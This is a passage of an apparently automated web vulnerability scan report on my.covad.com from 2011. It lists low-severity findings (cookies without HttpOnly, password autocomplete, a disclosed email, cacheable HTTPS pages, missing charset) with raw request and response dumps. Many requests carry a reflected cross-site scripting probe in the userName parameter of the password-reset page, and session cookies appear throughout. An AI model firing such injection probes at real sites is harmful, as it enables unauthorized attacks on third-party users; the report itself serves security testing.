GET /customercare/scripts/progressbar.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"818-1313052554000"
Last-Modified: Thu, 11 Aug 2011 08:49:14 GMT
Content-Type: text/javascript
Content-Length: 818
Set-Cookie: PL-PROD-Host-Id=1030; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=A67AD24432629E4993BF586A69ADCD79; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

var progressEnd = 5;        // set to number of progress <span>'s.
var progressColor = '#008bcc';    // set to progress bar color
var progressInterval = 1000;    // set to time between updates (milli-seconds)

va
...[SNIP]...

5.9. https://my.covad.com/customercare/scripts/tabs.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/tabs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/tabs.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"6988-1313052556000"
Last-Modified: Thu, 11 Aug 2011 08:49:16 GMT
Content-Type: text/javascript
Content-Length: 6988
Set-Cookie: PL-PROD-Host-Id=1030; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=5EBADC79E8D9EE1B19E87D475D4FF5B1; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

if (!document.getElementById) {
document.getElementById = function() { return null; }
}

var applicationcontext = "/customercare";

function clearTopMenu() {
   var uls = document.getElementsByTagN
...[SNIP]...

5.10. https://my.covad.com/customercare/scripts/wz_tooltip.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/wz_tooltip.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/wz_tooltip.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"35240-1313052556000"
Last-Modified: Thu, 11 Aug 2011 08:49:16 GMT
Content-Type: text/javascript
Content-Length: 35240
Set-Cookie: PL-PROD-Host-Id=1032; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=428F80DB0297FAB856B4A773A86F7895; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/* This notice must be untouched at all times.
Copyright (c) 2002-2008 Walter Zorn. All rights reserved.

wz_tooltip.js     v. 5.0

The latest version is available at
http://www.walterzorn.com
or http://
...[SNIP]...

5.11. https://my.covad.com/customercare/styles/login.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/styles/login.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/styles/login.css HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1381-1313052554000"
Last-Modified: Thu, 11 Aug 2011 08:49:14 GMT
Content-Type: text/css
Content-Length: 1381
Set-Cookie: PL-PROD-Host-Id=1031; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=1572324D5F324E319D0FC2DC4F1BB416; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

table#loginInfo {text-align:left;float:right;margin:0px 10px 0 0;font-family:arial;color:#333;font-size:12px;line-height:1.2em;height:57px;min-height:57px !important;}
html>body table#loginInfo {margi
...[SNIP]...

5.12. https://my.covad.com/customercare/styles/stylesheet.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/styles/stylesheet.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/styles/stylesheet.css HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"19433-1313052558000"
Last-Modified: Thu, 11 Aug 2011 08:49:18 GMT
Content-Type: text/css
Content-Length: 19433
Set-Cookie: PL-PROD-Host-Id=1031; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=05D30851405BB18C6F80BCC6DC31E23D; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*
Revised:
   - Replaced logo
   - Added 'colspan="3"' to the following <td>s
    * .headContent
    * .contentWide
   - Moved Phone Numbers link to Quick Links (added an automatic hide in the top to css--de
...[SNIP]...

5.13. https://my.covad.com/customercare/styles/tabs.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/styles/tabs.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/styles/tabs.css HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"2351-1313052552000"
Last-Modified: Thu, 11 Aug 2011 08:49:12 GMT
Content-Type: text/css
Content-Length: 2351
Set-Cookie: PL-PROD-Host-Id=1030; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=6BCB3F9E16E38A6B05BE1A3888C50C1D; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/* COLORS:
3f4041 Dark Grey
9da1a4 Leftnav Grey
cd2027 MP Red
*/
.floatNcenter {width:600px;margin:10px auto;text-align:left;}

.idBar {position:relative;font-family:arial;font-size:12px;color:#369;ma
...[SNIP]...

6. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/displayLoginAUPage.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /customercare/displayLoginAUPage.do HTTP/1.1
Host: my.covad.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 13674


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...
<div class="wrap">

                               <form name="loginAU" method="post" action="/customercare/loginAU.do">

                               <input type="hidden" name="IVDOMAIN" value="covad.net">
...[SNIP]...
<td class="left"><input type="password" name="IVPASSWORD" maxlength="32" size="30" value=""></td>
...[SNIP]...

7. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/displayLoginAUPage.do

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /customercare/displayLoginAUPage.do HTTP/1.1
Host: my.covad.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 13674


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...
<a HREF="mailto:abuse-team@covad.com">abuse-team@covad.com</a>
...[SNIP]...

8. Cacheable HTTPS response  previous  next
There are 3 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


8.1. https://my.covad.com/customercare/displayLoginAUPage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/displayLoginAUPage.do

Request

GET /customercare/displayLoginAUPage.do HTTP/1.1
Host: my.covad.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 13674


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...

8.2. https://my.covad.com/customercare/resetPassword.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/resetPassword.do

Request

GET /customercare/resetPassword.do;jsessionid=948E1DD4127CB6D261FE965929A88359 HTTP/1.1
Host: my.covad.com
Connection: keep-alive
Referer: https://my.covad.com/customercare/displayLoginAUPage.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=948E1DD4127CB6D261FE965929A88359; PL-PROD-Host-Id=1030; o_q=firsturl:https%3A//my.covad.com/customercare/displayLoginAUPage.do&urlcache:https%3A//my.covad.com/customercare/displayLoginAUPage.do&SrcID:0&referrer:&sourceid:0; cmTPSet=Y; CoreID6=60520090478713135077429&ci=90239903; 90239903_clogin=l=1313507742&v=7&e=1313509549739; cmRS=&t1=1313507742957&t2=1313507745228&t3=1313507749739&lti=1313507749739&ln=&hr=/customercare/resetPassword.do%3Bjsessionid%3D948E1DD4127CB6D261FE965929A88359&fti=&fn=loginAU%3A0%3B&ac=&fd=&uer=&fu=&pi=WEB-INF/jsp/layout/SmartBaseLayout.jsp&ho=data.coremetrics.com/eluminate%3F&ci=90239903&cjen=1

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 9754


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...

8.3. https://my.covad.com/customercare/resetPassword2.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/resetPassword2.do

Request

POST /customercare/resetPassword2.do HTTP/1.1
Host: my.covad.com
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword.do;jsessionid=948E1DD4127CB6D261FE965929A88359
Content-Length: 9
Cache-Control: max-age=0
Origin: https://my.covad.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=948E1DD4127CB6D261FE965929A88359; PL-PROD-Host-Id=1030; cmTPSet=Y; CoreID6=60520090478713135077429&ci=90239903; o_q=firsturl:https%3A//my.covad.com/customercare/displayLoginAUPage.do&urlcache:https%3A//my.covad.com/customercare/resetPassword.do%3Bjsessionid%3D948E1DD4127CB6D261FE965929A88359&SrcID:0&referrer:&sourceid:0; 90239903_clogin=l=1313507742&v=7&e=1313509551015; 90239903_clogin=l=1313507742&v=7&e=1313509553424; cmRS=&t1=1313507751010&t2=1313507751064&t3=1313507753423&t4=1313507749986&fti=1313507753423&fn=changePasswordForm%3A0%3B&ac=0:S&fd=0%3A1%3A%3B&uer=&fu=/customercare/resetPassword2.do&pi=WEB-INF/jsp/layout/SmartBaseLayout.jsp&ho=data.coremetrics.com/eluminate%3F&ci=90239903&cjen=1

userName=

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 9965


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...

9. HTML does not specify charset  previous
There are 3 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


9.1. https://my.covad.com/customercare/displayLoginAUPage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/displayLoginAUPage.do

Request

GET /customercare/displayLoginAUPage.do HTTP/1.1
Host: my.covad.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 13674


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...

9.2. https://my.covad.com/customercare/resetPassword.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/resetPassword.do

Request

GET /customercare/resetPassword.do;jsessionid=948E1DD4127CB6D261FE965929A88359 HTTP/1.1
Host: my.covad.com
Connection: keep-alive
Referer: https://my.covad.com/customercare/displayLoginAUPage.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=948E1DD4127CB6D261FE965929A88359; PL-PROD-Host-Id=1030; o_q=firsturl:https%3A//my.covad.com/customercare/displayLoginAUPage.do&urlcache:https%3A//my.covad.com/customercare/displayLoginAUPage.do&SrcID:0&referrer:&sourceid:0; cmTPSet=Y; CoreID6=60520090478713135077429&ci=90239903; 90239903_clogin=l=1313507742&v=7&e=1313509549739; cmRS=&t1=1313507742957&t2=1313507745228&t3=1313507749739&lti=1313507749739&ln=&hr=/customercare/resetPassword.do%3Bjsessionid%3D948E1DD4127CB6D261FE965929A88359&fti=&fn=loginAU%3A0%3B&ac=&fd=&uer=&fu=&pi=WEB-INF/jsp/layout/SmartBaseLayout.jsp&ho=data.coremetrics.com/eluminate%3F&ci=90239903&cjen=1

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 9754


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...

9.3. https://my.covad.com/customercare/resetPassword2.do  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/resetPassword2.do

Request

POST /customercare/resetPassword2.do HTTP/1.1
Host: my.covad.com
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword.do;jsessionid=948E1DD4127CB6D261FE965929A88359
Content-Length: 9
Cache-Control: max-age=0
Origin: https://my.covad.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=948E1DD4127CB6D261FE965929A88359; PL-PROD-Host-Id=1030; cmTPSet=Y; CoreID6=60520090478713135077429&ci=90239903; o_q=firsturl:https%3A//my.covad.com/customercare/displayLoginAUPage.do&urlcache:https%3A//my.covad.com/customercare/resetPassword.do%3Bjsessionid%3D948E1DD4127CB6D261FE965929A88359&SrcID:0&referrer:&sourceid:0; 90239903_clogin=l=1313507742&v=7&e=1313509551015; 90239903_clogin=l=1313507742&v=7&e=1313509553424; cmRS=&t1=1313507751010&t2=1313507751064&t3=1313507753423&t4=1313507749986&fti=1313507753423&fn=changePasswordForm%3A0%3B&ac=0:S&fd=0%3A1%3A%3B&uer=&fu=/customercare/resetPassword2.do&pi=WEB-INF/jsp/layout/SmartBaseLayout.jsp&ho=data.coremetrics.com/eluminate%3F&ci=90239903&cjen=1

userName=

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 9965


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...

Report generated by XSS.CX at Tue Aug 16 09:22:18 GMT-06:00 2011.